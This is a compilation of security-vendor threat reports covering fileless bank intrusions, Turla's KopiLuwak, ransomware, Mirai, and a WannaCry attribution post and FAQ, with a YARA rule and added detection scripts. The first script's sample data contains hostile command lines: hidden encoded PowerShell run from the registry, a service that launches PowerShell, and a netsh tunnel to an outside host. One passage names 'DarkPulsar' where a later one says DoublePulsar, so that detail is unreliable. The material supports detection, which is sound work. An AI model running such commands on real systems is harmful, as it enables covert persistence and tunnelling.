Another important aspect of an attack is the tunnels that are installed in the network by an attacker. Cybercriminals (such as Carbanak and GCMAN) might use PLINK for this purpose; Duqu 2.0 used a special driver.

In our predictions for 2017 we forecast an increase in ephemeral infections – memory-resident malware intended for general reconnaissance, with no interest in persistence. In highly sensitive environments, where stealth is essential, attackers might well be satisfied to operate until the malware is cleared from memory during a re-boot, since this will reduce the likelihood of the malware being detected and their operation being compromised.

During a recent incident response our experts found that both memory-based malware and tunnelling had been implemented in a bank attack using standard Windows utilities such as SC and NETSH. The threat was originally discovered by the bank’s security team after they detected Meterpreter code inside the physical memory of a domain controller. We participated in the forensic analysis following this detection and discovered the use of PowerShell scripts within the Windows registry. We also discovered that the NETSH utility was used for tunnelling traffic from the victim’s host to the attacker’s C2.

You can read the details of our investigation here.

Using the Kaspersky Security Network we found more than 100 enterprise networks infected with malicious PowerShell scripts in the registry.

We don’t know if they were all infected by the same attacker. During our analysis of the affected bank we learned that the attackers had used several third level domains and domains in the .GA, .ML and .CF ccTLDs. The benefit, for the attackers, of using such domains is that they are free and don’t include WHOIS information after the domain expiration. The fact that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information makes attribution almost impossible. The closest groups with the same TTPs are Carbanak and GCMAN.

Techniques like this are becoming more common, especially in attacks against financial institutions. Exfiltration of data can be achieved using standard utilities and some tricks, without the need for malware. Such ephemeral attacks highlight the need for sophisticated, proactive technology in anti-malware solutions, such as Kaspersky Lab’s System Watcher.
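As an added example (not Kaspersky’s tooling, and none of the values are indicators from the investigation), the following Python applies three heuristics to a constructed set of host artefacts: PowerShell scripts or -EncodedCommand payloads stored in registry values, services created with SC whose binPath runs PowerShell, and NETSH port-proxy entries of the kind used for tunnelling. The registry paths, service name and addresses are constructed samples.

```python
import base64
import re

# Heuristics for the artefacts described above (added example, not Kaspersky's tooling).
PS_CONTENT = re.compile(
    r"powershell|\bIEX\b|FromBase64String|-(?:e|ec|en|enc|encodedcommand)\b"
    r"|\b(?:Get|Set|Invoke|New|Start|Out|Add|Remove|Import|Write)-[A-Za-z]+\b",
    re.IGNORECASE)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand
ENCODED_ARG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|enco|encod|encode|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE)
SC_BINPATH = re.compile(
    r'\bsc(?:\.exe)?\s+(?:create|config)\s+(\S+).*?binpath=\s*("[^"]*"|\S+)',
    re.IGNORECASE)
NETSH_PORTPROXY = re.compile(
    r"\bnetsh(?:\.exe)?\s+interface\s+portproxy\s+add\s+v4tov4\b(.*)", re.IGNORECASE)


def _encoded(script: str) -> str:
    """Build a -EncodedCommand argument: base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample artefacts (kind, location, content); none are indicators from the report.
SAMPLE_ARTEFACTS = [
    ("registry", r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "powershell.exe -nop -w hidden -enc "
     + _encoded(r"Invoke-Expression (Get-ItemProperty 'HKLM:\SOFTWARE\Acme' -Name Stage)")),
    ("registry", r"HKLM\SOFTWARE\Acme\Stage",
     r"Get-Process | Out-File -FilePath C:\Windows\Temp\procs.txt"),
    ("cmdline", r"C:\Windows\System32\sc.exe",
     'sc create Svc1 binPath= "cmd /c powershell -nop -w hidden -enc AAAA" start= auto'),
    ("cmdline", r"C:\Windows\System32\netsh.exe",
     "netsh interface portproxy add v4tov4 listenport=4444 listenaddress=0.0.0.0 "
     "connectport=443 connectaddress=203.0.113.10"),
    ("registry", r"HKLM\SOFTWARE\Vendor\InstallPath", r"C:\Program Files\Vendor"),
    ("cmdline", r"C:\Windows\System32\netsh.exe", "netsh interface show interface"),
]


def decode_encoded_command(text: str):
    """Return the script behind a -EncodedCommand argument, or None if absent or invalid."""
    m = ENCODED_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_portproxy(cmdline: str):
    """Return the key=value parameters of a 'netsh interface portproxy add v4tov4', or None."""
    m = NETSH_PORTPROXY.search(cmdline)
    if not m:
        return None
    return dict(re.findall(r"(\w+)=(\S+)", m.group(1)))


def scan_artefacts(artefacts):
    """Apply the three heuristics and return a list of findings in artefact order."""
    findings = []
    for kind, location, content in artefacts:
        if kind == "registry" and PS_CONTENT.search(content):
            decoded = decode_encoded_command(content)
            findings.append({"rule": "powershell_in_registry", "where": location,
                             "detail": decoded if decoded else content[:60]})
        elif kind == "cmdline":
            sc = SC_BINPATH.search(content)
            if sc and PS_CONTENT.search(sc.group(2)):
                findings.append({"rule": "service_runs_powershell", "where": sc.group(1),
                                 "detail": sc.group(2)})
            proxy = parse_portproxy(content)
            if proxy:
                findings.append({"rule": "netsh_portproxy_tunnel", "where": location,
                                 "detail": "%s:%s -> %s:%s" % (
                                     proxy.get("listenaddress", "*"), proxy.get("listenport"),
                                     proxy.get("connectaddress"), proxy.get("connectport"))})
    return findings


if __name__ == "__main__":
    for f in scan_artefacts(SAMPLE_ARTEFACTS):
        print(f["rule"], f["where"], f["detail"], sep=" | ")
```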

KopiLuwak: a new JavaScript payload from Turla

The Russian-speaking APT group Turla (known variously as ‘Snake’, ‘Uroburos’, ‘Venomous Bear’ and ‘KRYPTON’) has been active since at least 2007 (and maybe even longer). Its activities have been traced to many high-profile incidents, including the 2008 attack against the US Central Command (the Buckshot Yankee incident) and, more recently, the attack against the Swiss military contractor, RUAG. We’ve discussed its activities on a number of occasions (here, here, here and here). The group intensified its activities in 2014, targeting Ukraine, EU-related institutions, governments of EU countries, global foreign affairs ministries, media companies and possibly corruption-related targets in Russia. In 2015 and 2016 the group diversified its activities, switching from the Epic Turla watering-hole framework to the Gloog Turla framework, which is still active. The group also expanded its spear-phishing activities with the Skipper/WhiteAtlas attacks, which made use of new malware. Recently, the group has intensified its satellite-based C2 registrations ten-fold compared to the 2015 average.

In January, John Lambert from Microsoft (@JohnLaTwC) tweeted about a malicious document that dropped a ‘very interesting .JS backdoor’. Since the end of November 2016, Kaspersky Lab has observed Turla using this new JavaScript payload and specific macro variant. This is a technique we’ve observed before with Turla’s ‘ICEDCOFFEE’ payloads (detailed in a private report from June 2016 which is available to customers of Kaspersky APT Intelligence Services). While the delivery method is somewhat similar to ICEDCOFFEE, the JavaScript differs greatly and appears to have been created mainly to avoid detection.

The targeting of this new malware is consistent with previous campaigns conducted by Turla, focusing on foreign ministries and other governmental organizations throughout Europe. However, the frequency is much lower than ICEDCOFFEE, with victim organizations numbering in the single digits (as of January 2017). We strongly believe that this new JavaScript will be used more heavily in the future as a first-stage delivery mechanism and victim profiler.

The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the attackers to run arbitrary commands via Wscript.

Full details on KopiLuwak can be found here.

The document contains a malicious macro that’s very similar to macros used previously by Turla to deliver Wipbot, Skipper, and ICEDCOFFEE. The Turla group continues to rely heavily on embedded macros in Office documents. This might seem to be a basic tactic for such a sophisticated attacker, but it has helped them to compromise high-value targets. We would advise organisations to disable macros and not allow employees to enable such content unless it’s absolutely necessary.

The lure document above shows an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus. Based on the name of the document, ‘National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc’, we presumed it may have been sent from the Qatar Ambassador’s secretary to the Ministry of Foreign Affairs, possibly indicating that the Turla group already had control of at least one system within Qatar’s diplomatic network.

The best defence against targeted attacks is a multi-layered approach that combines traditional anti-virus technologies with patch management, host intrusion detection and a default-deny whitelisting strategy. According to a study by the Australian Signals Directorate, 85 per cent of targeted attacks analysed could have been stopped by employing four simple mitigation strategies: application whitelisting, updating applications, updating operating systems and restricting administrative privileges.

Malware stories

Stand and deliver: your money or your files!

In eighteenth century Britain (and elsewhere) travellers could be waylaid by a highwayman – a thief who held up coaches on the public highway and demanded that those on board hand over their money and other valuables. The highwayman would typically issue the challenge – ‘Stand and deliver: your money or your life!’ Ransomware is a version of such highway robbery for the digital age – with the difference that it’s our data that is held hostage and the ‘highwayman’s’ ransom demand is displayed on the screen.

There were more than 1,445,000 ransomware attacks in 2016, on businesses as well as individuals. The huge growth we’ve seen in recent years is fuelled by the success that cybercriminals have had with this type of malware – ransomware is easily monetised and involves a low investment cost per victim.

Out of the 62 new crypto-ransomware families that we discovered last year, at least 47 were developed by Russian-speaking cybercriminals. In February, we published a report on the Russian ransomware economy. It’s clear that the development of ransomware is underpinned by a flexible and user-friendly underground eco-system that allows criminals to launch attack campaigns with almost any level of computer skills and financial resources. Our researchers identified three levels of criminal involvement in the ransomware business.

The first is the creation and update of ransomware families. This requires advanced code-writing skills; and those involved are the most privileged members of the ransomware underground, since they are the key to the whole eco-system. The second is the development and support of affiliate programmes for distributing ransomware. This is done by criminal communities that deliver the ransomware using ancillary tools such as exploit kits and spam. The third is partner participation in such affiliate programmes. Those involved are on the lowest rung of the ladder and their role is to help the owners of affiliate programmes to spread the malware, in return for a cut of the proceeds: the only qualifications required are a willingness to carry out illegal activities and the money to join the affiliate scheme.

We were able to identify several large groups of Russian-speaking criminals specialising in crypto-ransomware development and distribution. These groups might bring together tens of different partners, each with their own affiliate programme. The list of their targets includes not only individual consumers, but small- and medium-sized businesses and even enterprises. While initially targeting organisations in the Russian Federation, these groups are now shifting their attention to companies in other parts of the world. The daily revenue of an affiliate programme might reach tens, or even hundreds, of thousands of dollars: of this, around 60 per cent stays in the pockets of the criminals as net profit.

In March we reported a new ransomware family used in targeted attacks against organizations, named PetrWrap. Once they have gained a foothold in the target company, the attackers use the PsExec tool to install ransomware on all computers. One especially interesting aspect of this ransomware is that the attackers use the well-known Petya ransomware to encrypt data. Although Petya makes use of a ‘Ransomware-as-a-Service’ model, the attackers didn’t make use of this facility. Instead, they include a sample of the Petya ransomware inside the data section of the malware and use Petya to infect their victims’ computers. A special module patches the original Petya ransomware ‘on the fly’. This allows the attackers to hide the fact that they are using Petya.

Targeted ransomware attacks on organizations are becoming more common. The groups using ransomware in targeted attacks typically try to find vulnerable servers or servers with unprotected RDP access. After penetrating an organization’s network they use special frameworks such as Mimikatz to obtain the necessary credentials to install ransomware throughout the network. To protect against such attacks, organizations need to keep their server software up-to-date, use secure passwords for remote access systems, install security solutions on their servers and use security solutions with behavioral detection components on all their endpoints.

The Internet of broken Things

You might remember that in October 2016, cybercriminals used a botnet of Internet-connected home devices (such as IP-enabled cameras, DVRs, CCTV cameras and printers) to launch a DDoS attack. To do this, the attackers infected vulnerable devices with the Mirai malware. This operation was significant not only because it misused Internet of Things (IoT) devices, but also because the DDoS traffic generated exceeded all previous volumes. The DDoS took down a portion of the Internet and was severe enough to initiate investigations by the FBI and the DHS. At the time, they had not ruled out activity by a nation state, because of the overall power of the Mirai botnets. But even the scale of these attacks didn’t require the work of a nation state. Time will tell if nation states choose to hide their destructive activity in plain sight in the IoT – the capabilities are clearly available. It’s possible that we might see a nation state tempted to take down wide swaths of the Internet using this juvenile toolset.

In February, we looked at reports of a cross-platform Win32-based Mirai spreader and botnet in the wild. Some of the public discussions around this suggested that an entirely new IoT bot is spreading to and from Windows devices. But this is not the case: rather, a previously active Windows botnet is now spreading a Mirai bot variant. We hadn’t seen this spreader variant pushing Mirai downloaders until January. But this Windows bot itself is not new. The Windows bot’s method for distributing Mirai is very limited as well – it only delivers the Mirai bots to a Linux host from a Windows host if it successfully brute-forces a remote telnet connection.

So we haven’t seen a sensational hop from Linux Mirai to Windows Mirai. But we do have a new threat and the use of Windows to spread Mirai to previously unavailable resources. In particular, vulnerable SQL servers running Windows can be a problem, because they can be Internet-facing, and have access to private network connected IP-based cameras, DVR, media center software and other internal devices.

It’s unfortunate to see any sort of Mirai crossover between the Linux and Windows platforms. Just as the release of source code for the Zeus banking Trojan brought years of problems for the online community, the release of Mirai IoT bot source code will also bring major problems to the Internet infrastructure for years to come. This is just the start.

In response to the huge problem this poses to the Internet infrastructure, over the past few months our team and CERT have participated in multiple successful C2 take-down efforts that would otherwise have posed problems for partners simply providing notifications. While some security researchers may describe these take-downs as ‘whack a mole’, these efforts resulted in relief from Gbps DDoS storms for major networks. We’re happy to partner with more network operators to use our connections with CERTs, law enforcement agencies and other partners around the world, to build on this success.

You can read our report here.

This attack, like others that involve compromised IoT devices, exploited the fact that many people don’t change the manufacturer’s default credentials when they buy a smart device. This makes it easy for attackers to access the device – they simply have to try the known default password. In addition, there are no firmware updates for many devices. IoT devices are also an attractive target for cybercriminals because they often have 24/7 connectivity.

These days we’re surrounded by smart devices. This includes everyday household items such as telephones, televisions, thermostats, refrigerators, baby monitors, fitness bracelets and children’s toys. But it also includes cars, medical devices, CCTV cameras and parking meters. Some homes are even designed now with the ‘smartness’ built-in. Ubiquitous Wi-Fi brings all these devices online, as part of the Internet of Things (IoT). These things are designed to make our lives easier. Since everyday objects are able to collect and transfer data automatically, without human interaction, they can operate more effectively and efficiently. However, a world of connected everyday objects means a bigger attack surface for cybercriminals. Unless IoT devices are secured, the personal data they exchange can be compromised, they can be subject to an attack, or they can be used in an attack.

One of the problems associated with IoT devices is that they are often everyday objects that have provided useful functions for much longer than the Internet has been around. So we don’t see the computer within the object. Nowhere is this truer than with children’s toys. In the last two years security and privacy concerns around children’s toys have been raised on a number of occasions (you can read more here, here and here).

In February, similar concerns were raised about the My Friend Cayla doll. The Federal Network Agency, the German telecommunications watchdog, suggested that parents that had bought the doll should destroy it because of these worries.

The best advice for anyone using connected/IoT devices at home is to ensure the default passwords on all devices are changed (using unique, complex passwords) to prevent them being remotely accessed – this includes home routers, which are the gateway to your home network. The temptation may be for people to want to disconnect all devices in light of such news, but in today’s increasingly connected world, that’s not realistic; although it’s always good to review the functionality of a smart device and disable any functions that you don’t actually need. However, good password ‘housekeeping’ goes a long way to keeping cybercriminals away from your devices. This kind of large scale attack also highlights the need for manufacturers to consider security by design, rather than as an afterthought.

Data breaches and data dumps

We’ve become accustomed to seeing a steady stream of security breaches month after month; and this quarter has been no exception, including attacks on Barts Health Trust, Sports Direct, Intercontinental Hotels Group and ABTA.

Some breaches result in the theft of sensitive data, highlighting the fact that many companies fail to take adequate steps to defend themselves. Any organisation that holds personal data has a duty of care to secure it effectively. This includes hashing and salting customer passwords and encrypting other sensitive data.

Consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard. One alternative is to use a password manager application to handle all this automatically. It’s also a good idea to use two-factor authentication, where an online provider offers this feature – requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings.

The public dumping of sensitive information has been gathering pace in recent years. This is a trend that we predicted in 2015. ‘Hacktivists’, criminals and state-sponsored attackers alike have embraced the strategic dumping of private pictures, information, customer lists and code to shame their targets. While some of these attacks are strategically targeted, some are also the product of opportunism, taking advantage of poor cyber-security.

In February, WikiLeaks released more than 8,000 documents, referred to as ‘Vault 7’, that describe tactics and tools used to break into computing devices from leading manufacturers, to circumvent installed security solutions and even lay a trail of false flags. The first batch of documents released (dated between 2013 and 2016) included documentation on how to compromise major browsers, smartphones and computers running Windows, Mac OS and Linux. Subsequent dumps of data focused on the development of malware to compromise firmware running on Mac OS and iOS, especially EFI and UEFI firmware; and on methods to evade detection. You can read more here and here.

We can only expect this practice to continue to grow in the future. Consumers and businesses alike should use encryption to secure sensitive data and should ensure that they apply updates as soon as they become available, to reduce the chances that their data will be stolen and dumped online.

WannaCry and Lazarus Group – the missing link?

Mon, 05/15/2017 - 15:32

Moments ago, Neel Mehta, a researcher at Google posted a mysterious message on Twitter with the #WannaCryptAttribution hashtag:

The cryptic message in fact refers to similarity between samples that share code. The two samples Neel refers to are:

  • A WannaCry cryptor sample from February 2017 which looks like a very early variant
  • A Lazarus APT group sample from February 2015

The similarity can be observed in the screenshot below, taken between the two samples, with similar code highlighted:

So, what does it all mean?

I know about Wannacry, but what is Lazarus?

We wrote about the Lazarus group extensively and presented together with our colleagues from BAE and SWIFT at the Kaspersky Security Analyst Summit (SAS 2017). See:

Among other things, the Lazarus group was responsible for the Sony Wiper attack, the Bangladesh bank heist and the DarkSeoul operation.

We believe Lazarus is not just “yet another APT actor”. The scale of the Lazarus operations is shocking. The group has been very active since 2011 and was originally disclosed when Novetta published the results of its Operation Blockbuster research. During that research, in which we also participated, hundreds of samples were collected, showing that Lazarus is operating a malware factory that produces new samples via multiple independent conveyors.

Is it possible this is a false flag?

In theory anything is possible, considering the 2015 backdoor code might have been copied by the Wannacry sample from February 2017. However, this code appears to have been removed from later versions. The February 2017 sample appears to be a very early variant of the Wannacry encryptor. We believe that a false flag theory, although possible, is improbable.

What conclusions can we make?

For now, more research is required into older versions of Wannacry. We believe this might hold the key to solving some of the mysteries around this attack. One thing is for sure — Neel Mehta’s discovery is the most significant clue to date regarding the origins of Wannacry.

Are we sure the early February variant is the precursor to the later attacks?

Yes, it shares the same list of file extensions targeted for encryption but, in the May 2017 versions, more extensions were added:

> .accdb
> .asm
> .backup
> .bat
> .bz2
> .cmd
> .der
> .djvu
> .dwg
> .iso
> .onetoc2
> .pfx
> .ps1
> .sldm
> .sldx
> .snt
> .sti
> .svg
> .sxi
> .vbs
> .vcd

They also removed an older extension, “.tar.bz2”, and replaced it with just “.bz2”.
We strongly believe the February 2017 sample was compiled by the same people, or by people with access to the same source code as the May 2017 Wannacry encryptor used in the May 11th wave of attacks.

So. Now what?

We believe it’s important that researchers around the world investigate these similarities and attempt to discover more facts about the origin of Wannacry. Looking back to the Bangladesh attack, in the early days, there were very few facts linking them to the Lazarus group. In time, more evidence appeared and allowed us, and others, to link them together with high confidence. Further research can be crucial to connecting the dots.

Has anyone else confirmed this?

Yes, Matt Suiche from Comae Technologies confirmed the same similarity based on Neel’s samples:

Can you share the YARA rule used to find this?

Yes, of course. Here you go:

rule lazaruswannacry {
    meta:
        description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta"
        date = "2017-05-15"
        reference = ""
        author = "Costin G. Raiu, Kaspersky Lab"
        version = "1.0"
        hash = "9c7c7149387a1c79679a87dd1ba755bc"
        hash = "ac21c8ad899727137c4b94458d7aa8d8"

    strings:
        // code fragment present in both the Feb 2017 Wannacry sample and the Feb 2015 Lazarus backdoor
        $a1 = { 51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75
                04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01
                46 56 E8 }

        // table of 16-bit values shared by both samples
        $a2 = { 03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00
                10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00
                30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00
                38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00
                44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00
                68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00
                FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0
                08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0
                10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0
                2B C0 2C C0 FF FE }

    condition:
        ((uint16(0) == 0x5A4D)) and (filesize < 15000000) and all of them
}

WannaCry FAQ: What you need to know today

Mon, 05/15/2017 - 13:06

Friday May 12th marked the start of the dizzying madness that has been ‘WannaCry’, the largest ransomware infection in history. Defenders have been running around with their heads on fire trying to get ahead of the infection and to understand the malware’s capabilities. In the process, a lot of wires have gotten crossed and we figured it’s time to sit down and set the record straight on what we know, what we wish we knew, and what the near future might hold for us going forward.

In the interest of standing by our stated mission, ‘We’re Here to Save the World’, we’re also sharing IOCs and Yara rules below.

Please remember: Patch, Patch, Patch!

For a refresher on the weekend of madness, please see our original blog.

How did it all start? Was there an e-mail attack vector? Phishing link?

To date, we could not find an e-mail attack vector for Wannacry. We are still investigating leads that suggest compromised sites were used to target some customers. So far, we can confirm that our users are getting attacked using an implementation of the famous EternalBlue exploit leaked by the Shadowbrokers in April. The exploit installs the DarkPulsar backdoor, which is further leveraged to infect a system. Even if the EternalBlue exploit fails in the first place, the attack code still tries to leverage the DarkPulsar backdoor which might have been installed in a previous attack.

Perhaps the main reason why Wannacry was so successful is the fact that the EternalBlue exploit works over the Internet without requiring any user interaction. It works on top of TCP port 445. Last week, our Internet-facing sensors registered an uptick in port 445 connections on Thursday May 11th, one day before the major outbreak noted on Friday. This means it’s possible the worm was released on Thursday, possibly even late Wednesday evening. The uptick in port 445 traffic is also confirmed by the SANS DShield project’s graphics.

Port 445 connections per day

I’ve seen conflicting reports about the exploit. Is it targeting SMBv1 or SMBv2?

The vulnerability exploited by the EternalBlue tool lies in the SMBv1 implementation. However, to exploit it, the tool also uses SMBv2. This means that it uses both SMBv1 and SMBv2 packets during the attack. Disabling SMBv1 or SMBv2 prevents the infection; however, while disabling SMBv1 (an old protocol) has no significant impact on modern systems, disabling SMBv2 can cause problems. This is why it is highly recommended to disable SMBv1 for the current attack and for the future.

What is the killswitch? Can we rely on it?

The worm-spreading part of Wannacry – which is designed to infect other computers – has a special check at the beginning. It tries to connect to a hardcoded website on the Internet and if the connection FAILS, it continues with the attack. If the connection WORKS, it exits. Thus, by registering this domain and pointing it to a sinkhole server, a researcher from the U.K. successfully slowed the spread of the worm.

Can we ultimately rely on this? Well, there has been a lot of speculation about the effectiveness of this killswitch. On the one hand, it does stop further spread of the infection, but only if the worm is able to connect to the Internet. Many corporate networks have firewalls blocking internet connections unless a proxy is used. In those networks, the worm will continue to spread locally. On the other hand, there is nothing stopping the attackers from releasing a new variant that does not implement a killswitch.

Why did the attackers add a killswitch in the first place?

This is a very good question. Some possible explanations:

  • They were afraid the attack might get out of control and wanted a way to stop the propagation.
  • They coded it as an anti-sandbox check (some sandboxes emulate all internet connections and make them appear to work even if they do not exist).

Has this attack been contained?

We started tracking the attack early today to determine if it’s spiking again. Since 06.00 UTC/GMT on Monday 15th May, we have observed a sixfold decrease in attacks across our customer base compared with the first hours on Friday May 12th.

This suggests infections based on current variants may be under control.

Wait, what do you mean by “current variants”? Is there a second wave of attacks?

Over the weekend two notable variants emerged. Kaspersky Lab does not believe any of these variants were created by the original authors – they were most likely patched by others keen to exploit the attack separately and independently.

The first one started spreading on Sunday morning, at around 02.00 UTC/GMT and was patched to connect to a different domain (ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com). Kaspersky Lab has so far noted three victims for this variant, located in Russia and Brazil.

Code patch from d724d8cc6420f06e8a48752f0da11c66

The second variation that appeared during the weekend appears to have been patched to remove the killswitch. This variant does not appear to be spreading, possibly due to a bug.

Sample MD5                          In the wild   Killswitch present?   Killswitch domain
d5dcd28612f4d6ffca0cfeaefd606bcf    Yes           Yes                   ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com
d724d8cc6420f06e8a48752f0da11c66    No            No                    n/a

Does the second wave contain the killswitch?

The d5dcd28612f4d6ffca0cfeaefd606bcf sample distributed on Sunday night (first reports around 02:00am UTC) contains a killswitch domain. This domain (ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com) is only two bytes different from the original:

Sample            Killswitch domain
Old               iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com
New (see above)   ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

The second domain was sinkholed by Matt Suiche of Comae Technologies, who reported stopping about 10,000 infections from spreading further.

How much money has been paid by victims so far?

WannaCry Wallet Tracker as of Monday May 15th.

Multiple attempts have been made at tracking transactions to known bitcoin wallets used by WannaCry. The tracker ‘’ has the latest count (at the time of writing) at upwards of 31 BTC, or close to $55,000 USD.

What will the attackers do with the money?

An Evil Lair?

We believe it’s unlikely the attackers will be able to do anything with the bitcoins, considering the current high level of interest in this story. Even though the wallet owners are anonymous, the transactions are visible to everybody and can be tracked. Once the bitcoins reach a payment point, where the attackers use them to purchase something in the real world, that payment can be tracked to shipment details, services, or other IPs, effectively increasing the chances of getting caught.

Does payment guarantee the recovery of files?

We don’t know. Since we are dealing with criminals, there is no reason to expect them to honor the deal, especially in a situation where all the world is closely tracking this campaign and disrupting it as much as possible. Paying the ransom amounts to funding the next wave.

Do not pay the ransom.

How does the worm spread inside a local corporate network?

The malware includes worm functionality that tries to infect other unpatched Windows machines inside the local network, generating a large volume of SMB traffic. Basically, it scans LAN IPs for an open SMB port (TCP 445) and, wherever it finds one, delivers the EternalBlue exploit.
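Detection logic for the scanning behaviour described above, as an added example that is not part of the original post: it flags any source that opens TCP/445 connections to many distinct hosts within a short window, which is what the worm's LAN sweep looks like in flow or firewall logs. The record format and every address below are constructed for the example, not captured data.

```python
"""Flag hosts fanning out to many distinct peers on TCP/445 (WannaCry-style
LAN scanning). Added example; log format and addresses are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed record format: "<ISO8601 UTC> src=<ip> dst=<ip> proto=<tcp|udp> dport=<n>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z)\s+"
    r"src=(?P<src>[\d.]+)\s+dst=(?P<dst>[\d.]+)\s+"
    r"proto=(?P<proto>\w+)\s+dport=(?P<dport>\d+)\s*$"
)


def parse_flow(line):
    """Parse one record; return None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "src": m["src"],
        "dst": m["dst"],
        "proto": m["proto"].lower(),
        "dport": int(m["dport"]),
    }


def smb_fanout_alerts(lines, window=timedelta(seconds=60), threshold=10):
    """Return [(src, window_start, distinct_targets)] for every source that
    contacted at least `threshold` distinct hosts on TCP/445 inside `window`.
    One alert per source, reporting its busiest window. Internet-facing
    targets count too: the worm picks both LAN and random internet IPs."""
    by_src = defaultdict(list)
    for line in lines:
        f = parse_flow(line)
        if f and f["proto"] == "tcp" and f["dport"] == 445:
            by_src[f["src"]].append((f["ts"], f["dst"]))

    alerts = []
    for src, events in by_src.items():
        events.sort()
        best = None
        for i, (t0, _) in enumerate(events):
            # distinct peers contacted from t0 up to t0 + window
            peers = {dst for ts, dst in events[i:] if ts - t0 <= window}
            if len(peers) >= threshold and (best is None or len(peers) > best[1]):
                best = (t0, len(peers))
        if best:
            alerts.append((src, best[0], best[1]))
    return sorted(alerts)


def constructed_sample_log():
    """Constructed flows: one worm-like scanner and one ordinary SMB client."""
    base = datetime(2017, 5, 12, 10, 0, 0)

    def stamp(t):
        return f"{t:%Y-%m-%dT%H:%M:%SZ}"

    lines = []
    # 10.0.1.15 probes 12 LAN hosts and 3 internet addresses within 30 s
    targets = [f"10.0.1.{n}" for n in range(16, 28)] + [
        "203.0.113.7", "203.0.113.9", "203.0.113.12"]
    for i, dst in enumerate(targets):
        lines.append(f"{stamp(base + timedelta(seconds=2 * i))} "
                     f"src=10.0.1.15 dst={dst} proto=tcp dport=445")
    # 10.0.1.40 talks to the same file server 20 times: high volume, one peer
    for i in range(20):
        lines.append(f"{stamp(base + timedelta(seconds=i))} "
                     f"src=10.0.1.40 dst=10.0.1.5 proto=tcp dport=445")
    lines.append(f"{stamp(base)} src=10.0.1.40 dst=198.51.100.2 proto=tcp dport=443")
    return lines


if __name__ == "__main__":
    for src, start, n in smb_fanout_alerts(constructed_sample_log()):
        print(f"{src} contacted {n} distinct hosts on TCP/445 starting {start:%H:%M:%S}Z")
```

The threshold and window are tuning knobs; a busy file server client keeps a single peer, so only the fan-out host is reported.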

Have any other exploits been used?

The only exploit observed so far being used in this campaign is the EternalBlue exploit leaked by Shadow Brokers.

Interestingly, once the malware infects a computer, it runs shellcode to drop and execute its payload. The payload code is available for both 32- and 64-bit systems, runs in ring-0, and seems to be based on the DoublePulsar backdoor leaked by Shadow Brokers in their ‘Lost in Translation’ blog post.

Can you explain what happens for victims behind a proxy?

The killswitch prevented the main strain of the malware from encrypting the files in the infected computers, basically by checking if a given domain was registered or not. However, WannaCry does not check for the presence of any proxy, so it is likely that samples running inside an organization will not be able to reach the killswitch domain, even if it’s already registered. That means their files will still be encrypted.

Who is behind the attack? Is it just one group or multiple groups of attackers?

The attackers didn’t leave many clues about their identities or whereabouts. We are still investigating several possible leads and we’re sharing all relevant information with law enforcement.
At the moment, we haven’t seen any indicators that point towards any known groups. Some early variants of the Wannacry ransomware seem to have been used in March 2017, maybe some as early as February 2017. We are still researching these early variants, scraping them for clues.

Is this primarily targeting Russians?

The spread of the worm does not target a specific geolocation. The distribution is random, selecting IPs from the internet and affected local networks. Nevertheless, a large amount of the infections are in Russia, about 66% of the total attacks we have seen. The skew in distribution is likely due to a combination of our increased visibility into Russia as well as a likely prevalence of unpatched systems.

Are you working with law enforcement to help contain this attack?

Yes, we are working with several law enforcement agencies and have provided them with information to help mitigate the attack.

Microsoft is warning against governments stockpiling cyberweapons and called for a Digital Geneva Convention. Will this help?

Kaspersky Lab supports Brad Smith’s call to action for governments and industries around the world to take critically important steps to help make a better digital future for all. We strongly believe the world needs an international digital convention, support the creation of a neutral international cyber organization, and firmly support a pledge from companies not to conduct offensive cyber activities and to protect their users from all cyberattacks. For more details please see:

What should I do right now to make sure my organization is protected?

Our recommendations:

  • Install the MS Security Bulletin patches for MS17-010. Please note that Microsoft also released an emergency patch for Windows XP, which is out of support!
  • Disable SMBv1.
  • Backup your data on a regular basis and be sure to store the backups offline.
  • Limit administrative privileges in the network.
  • Segment your network.
  • Make sure all nodes have security software installed and updated.
  • Kaspersky users: make sure System Watcher is enabled and the software updated. System Watcher will ensure rollback of any encrypted files.
